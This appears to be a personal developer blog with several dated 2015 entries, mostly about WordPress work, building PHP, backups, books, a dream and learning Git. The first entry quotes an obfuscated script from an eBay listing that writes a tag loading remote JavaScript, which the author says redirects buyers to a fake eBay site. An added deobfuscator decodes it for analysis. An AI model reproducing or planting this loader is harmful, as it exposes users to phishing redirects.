Wednesday, 18 March 2015

eBay still allowing redirecting js in listings

Today I came across another eBay listing that redirects you to a fake eBay site, so it seems eBay still haven't fixed this problem. (Or they fixed it but the scammers have found another alternative). I guess that eBay allow JS in auction listings because some sellers like to use auction widgets to show off their other items. It would be much safer if eBay just had their own widget people could use and didn't allow users to input JS.

The hack looks like this. As part of the description they include the following:

<script> var _0x2786=["\x53\x43","\x52\x49","\x50\x54","\x53\x52","\x43\x3D","\x68\x74\x74","\x70\x3A\x2F\x2F","\x6C\x6F\x73\x73\x65\x72\x74\x69\x6D\x65\x2E\x63\x6F\x6D\x2F\x78\x69\x78\x6B\x6D\x73\x6E\x65\x2E\x6A\x73","\x3C","\x20\x74\x79\x70\x65\x3D\x27\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27","\x3E","\x77\x72\x69\x74\x65","\x3C\x2F"];var ya=_0x2786[0];var yb=_0x2786[1];var yc=_0x2786[2];var yd=_0x2786[3];var ye=_0x2786[4];var yf=_0x2786[5];var yg=_0x2786[6];var fy0=_0x2786[7];document[_0x2786[11]](_0x2786[8]+ya+yb+yc+_0x2786[9]+yd+ye+yf+yg+fy0+_0x2786[10]);document[_0x2786[11]](_0x2786[12]+ya+yb+yc+_0x2786[10]); </script>

Basically the script adds another script to the page. This other script then does the redirection. The text that makes up the script tag to add is split into pieces, and they've encoded the characters as Unicode rather than using UTF-8 / ASCII. If you look at the _0x2786 array, it looks like this:
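
The script above can be unpacked without running it. This is an added example, not part of the original post: it treats the script body as text, decodes the \xNN escapes in the _0x2786 table, resolves the ya...fy0 aliases and rebuilds the markup each document[...] call would write. The function names (decodeHex, deobfuscate, externalSrc) are this example's own.

```javascript
// Script body copied from the listing above, held as inert text (String.raw keeps
// the \xNN escapes literal). Nothing in it is executed.
const SAMPLE = String.raw`var _0x2786=["\x53\x43","\x52\x49","\x50\x54","\x53\x52","\x43\x3D","\x68\x74\x74","\x70\x3A\x2F\x2F","\x6C\x6F\x73\x73\x65\x72\x74\x69\x6D\x65\x2E\x63\x6F\x6D\x2F\x78\x69\x78\x6B\x6D\x73\x6E\x65\x2E\x6A\x73","\x3C","\x20\x74\x79\x70\x65\x3D\x27\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27","\x3E","\x77\x72\x69\x74\x65","\x3C\x2F"];var ya=_0x2786[0];var yb=_0x2786[1];var yc=_0x2786[2];var yd=_0x2786[3];var ye=_0x2786[4];var yf=_0x2786[5];var yg=_0x2786[6];var fy0=_0x2786[7];document[_0x2786[11]](_0x2786[8]+ya+yb+yc+_0x2786[9]+yd+ye+yf+yg+fy0+_0x2786[10]);document[_0x2786[11]](_0x2786[12]+ya+yb+yc+_0x2786[10]);`;

// Turn \xNN escapes in a string literal into the characters they stand for.
function decodeHex(lit) {
  return lit.replace(/\\x([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

function deobfuscate(src) {
  // 1. String table: var NAME=["..","..",...]
  const m = /var\s+(\w+)\s*=\s*\[([^\]]*)\]/.exec(src);
  if (!m) throw new Error('no string table found');
  const name = m[1];
  const table = [...m[2].matchAll(/"([^"]*)"/g)].map(q => decodeHex(q[1]));

  // 2. Aliases: var ya=NAME[0];
  const vars = {};
  const aliasRe = new RegExp(String.raw`var\s+(\w+)\s*=\s*${name}\[(\d+)\]`, 'g');
  for (const a of src.matchAll(aliasRe)) vars[a[1]] = table[Number(a[2])];

  // 3. Calls: document[NAME[i]](term+term+...), each term a table ref or an alias.
  const refRe = new RegExp(String.raw`^${name}\[(\d+)\]$`);
  const resolve = t => (refRe.test(t) ? table[Number(refRe.exec(t)[1])] : vars[t]);
  const callRe = new RegExp(String.raw`document\[${name}\[(\d+)\]\]\(([^)]*)\)`, 'g');
  const calls = [...src.matchAll(callRe)].map(c => ({
    method: table[Number(c[1])],
    arg: c[2].split('+').map(t => resolve(t.trim())).join(''),
  }));
  return { table, calls };
}

// Pull the injected script's src out of the written markup and defang it for a report.
function externalSrc(calls) {
  const html = calls.map(c => c.arg).join('');
  const m = /src\s*=\s*['"]?([^'"\s>]+)/i.exec(html);
  return m ? m[1].replace(/^http/i, 'hxxp').replace(/\./g, '[.]') : null;
}

const result = deobfuscate(SAMPLE);
console.log(result.table);                 // the decoded string table
console.log(result.calls);                 // method name and markup for each call
console.log(externalSrc(result.calls));    // defanged address of the second-stage script
```

Both calls resolve to document.write: the first writes an opening SCRIPT tag whose SRC points at the external file, the second writes the closing tag.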

Wednesday, 4 March 2015

Good books are too expensive

I spent most of this morning trying to get one of my WordPress plugins to work with the WP Super Cache plugin without late init enabled. I got quite far, then realised that my plugin actually needs to call the database for one of its methods, and so wouldn't work without late init. So most of my work this morning was just scrapped.

In the afternoon I noticed a book on eBay called Great Stalinist Photographic Books - RODCHENKO, EL LISSITZKY - Rare, Brand New, which was selling for £200! I checked Amazon, and it was a similar price on there too. However, doing a bit more checking it seems it can be had cheaper (though still expensively) - $70.90 + $3.99 shipping new from Amazon Marketplace (a different entry for the book where it is titled Paradnaja kniga Strany Sovetov. 2007 / Great Stalinist Photographic Books (Fotoiskusstvo) (Hardcover)). Or from Ozonru, where it is selling for £41.40.

I contacted another website that had the book listed and had a price, but didn't seem to have any way to buy online. So I'll see if it can be had cheaper from there. Likely they don't have it in stock, don't ship to the UK, or want the payment through WebMoney (which is not available in the UK).

Saturday, 7 February 2015

Descripting

This morning I did some work on a couple of my WordPress plugins.

In the afternoon I wrote a blog post for my photography blog. I got that done fairly quickly. Then I realised that I would really need to add descriptions and keywords for the images to illustrate the blog post, and then upload the images to the site. So I spent most of the rest of the afternoon and evening doing that.

The description writing process was fairly simple. I didn't have any photos of buildings I needed to research to try and find out what they were. It was just photos of trees and fields. I just had to write a description of what was in the image. But it still took me ages.

Anyway, at least I got it done in the end. Though I still haven't selected which ones to use to illustrate the blog post, or uploaded any of them yet. A task I can finish off tomorrow hopefully.

Monday, 2 February 2015

Exiting a dream

This morning I was having a dream, I can't remember most of it, but I do remember the end. I was going on a 2D computer game featuring Toad (from the Mario games) on an old yellowed plastic CRT monitor. The monitor was in front of some windows.

I needed to finish what I was doing (possibly I knew it was time to wake up?), so I tried to pull the curtains, from one side at a time. After I'd pulled the curtains on each side of the window, there was still a big gap between them. So I pulled the right curtain a bit more, but still there was a gap. I pulled the left curtain a bit more, and there was still a gap left.

I looked up at where the right curtain was attached to the curtain rail and noticed it was scrunched up. I gave it a hard tug and it nearly closed the gap, there was just a small gap left, which I thought was good enough. But further down was a larger gap, I looked and noticed that the left curtain was scrunched up at the bottom.

But in the gap between the curtains, sitting on the window sill, was a model of a man (not an accurate model) made from octagonal tazos. But unlike in real life, most of the tazos were positioned just one above the other. (They need to be positioned at right-angles to one another to be able to lock together in real life).

I figured that if I unscrunched the bottom of the left curtain so that it covered the model, then when pulling the curtains the next day, it might knock the figure over, so I might as well leave the curtain as it was.

On the computer I pressed the Esc key to quit the game I was going on. Then I realised that I had forgotten to save, and the game just quits when you press Esc without asking you if you want to save. This wasn't a problem in that I hadn't done anything on the game. But I knew that next time I tried to go on it I would get a message that I had quit without saving.

I then shut down the computer, which involved bringing up an on-screen keyboard that had a 'quit' or 'exit' (I can't remember) button at the top left. Then my dream ended. So it seems that this actually quit my dream.

Monday, 26 January 2015

Trying to build PHP for 3 days and binary comparing

Someone asked me about writing a WordPress plugin for them, and to do this I needed to rely on another WordPress plugin. Only problem was that the other plugin wouldn't run on my PHP installation as it required the gmp or bcmath extensions, neither of which my PHP installation included.

So I tried building the latest version of PHP, along with the latest versions of the libs the various extensions I need depend on. The first problem I had was that I couldn't get openldap to build. After looking into it, it seems that Oracle changed their licence terms for the newer versions of Berkeley DB and openldap is not 'compatible' with these licence terms. So it includes a check to make sure it won't work with the newer versions of Berkeley DB.

I couldn't see how to get openldap compiled without Berkeley DB, so I just gave up. I don't really need the ldap extension for PHP anyway.

After building all the needed dependencies, I tried building PHP, but got an error during compiling. I searched to see if anyone else had the same problem, and there didn't seem to be a solution. Just debugging advice - try and work out the minimum configure needed to reproduce the error, so you can see if it is a certain extension or two conflicting extensions causing the problem.

I then spent almost three days just trying to build PHP, changing some option, trying again, etc. in an effort to work out what the problem was.

The strange thing is that when I started doing this, I got a different error relating to openssl, even if I was compiling with no other extensions specified in my configure line. Adding --disable-all to configure, I then managed to build with openssl. Gradually adding all the options back got me to the point where the original error message popped up again.

After many more build attempts I figured out the issue was my usage of the tidy-nu lib rather than the very old and outdated tidy. Changing this back to the old tidy and removing the --disable-all I was able to build okay. But that doesn't really make sense - what happened to the openssl error I was getting previously? Anyway, I guess finally getting it to build was the main thing.

Each build attempt takes at least half an hour before you see whether it was successful or not. This is why it took three days of changing the different configure options, rebuilding, then seeing if it worked or not before trying again with different options to narrow down the problem.

Today I was doing my morning backup as usual, but my backup drive was full. So I decided to re-organise my files a bit and move some to another drive. After moving the files I did a binary compare against one of the backups, and a few files were different. One was a Photoshop file, and one of the layers in the backup file had become corrupted. Another was a NEF (Nikon RAW file) that had become corrupted on the backup.

Two were large panoramas with many layers. I looked through the images, layer by layer, looking to see any evidence of corruption, both the backup copies and the originals. This took quite a while. However I couldn't see any problems. Since the other two images were both corrupted on the backups I decided to just copy the originals over the backups. The reason for doing this is just to avoid those files being flagged again in a binary compare in the future and me having to perform the same procedure.

With the files safely in their new location I backed them up to one of the disks I use for backing up the drive they are now located on. After doing that I ran a binary compare between the two drives. The new files had all copied okay, but there were a few corrupted files in other places, again, all on the backup. As well as images there were also some shortcuts that had become corrupted, and even a text file:

Thursday, 8 January 2015

Baking, checking, and fixing

Yesterday I was doing my monthly website stats checking, and also made some Eccles Cakes. I made the Eccles Cakes with grapefruit zest rather than lemon or orange, and I don't think they were as nice as normal.

As usual, my stats checking brought a number of issues to my attention, and so this morning (and yesterday evening) was spent looking into those issues and trying to fix them.

Tuesday, 6 January 2015

Gitting

Today I was trying to learn how to use Git. I started reading Sitepoint's Git Fundamentals ebook a week or so ago, then finished it off today. Unfortunately it was pretty useless and written for Mac / Linux users. E.g. discussing the head command it says to use HEAD^, but ^ is an escape character in Windows so you actually need to type HEAD^^.

I found a much better guide, which is free, here: Git Tutorial. This covers much more and explains the different commands better than the Sitepoint guide (though the section about branches seems to be in the wrong place). The Sitepoint guide doesn't really cover enough to start using git for real purposes, only enough for a very simple demonstration.

In the evening I set up git for one of my websites and started making some changes.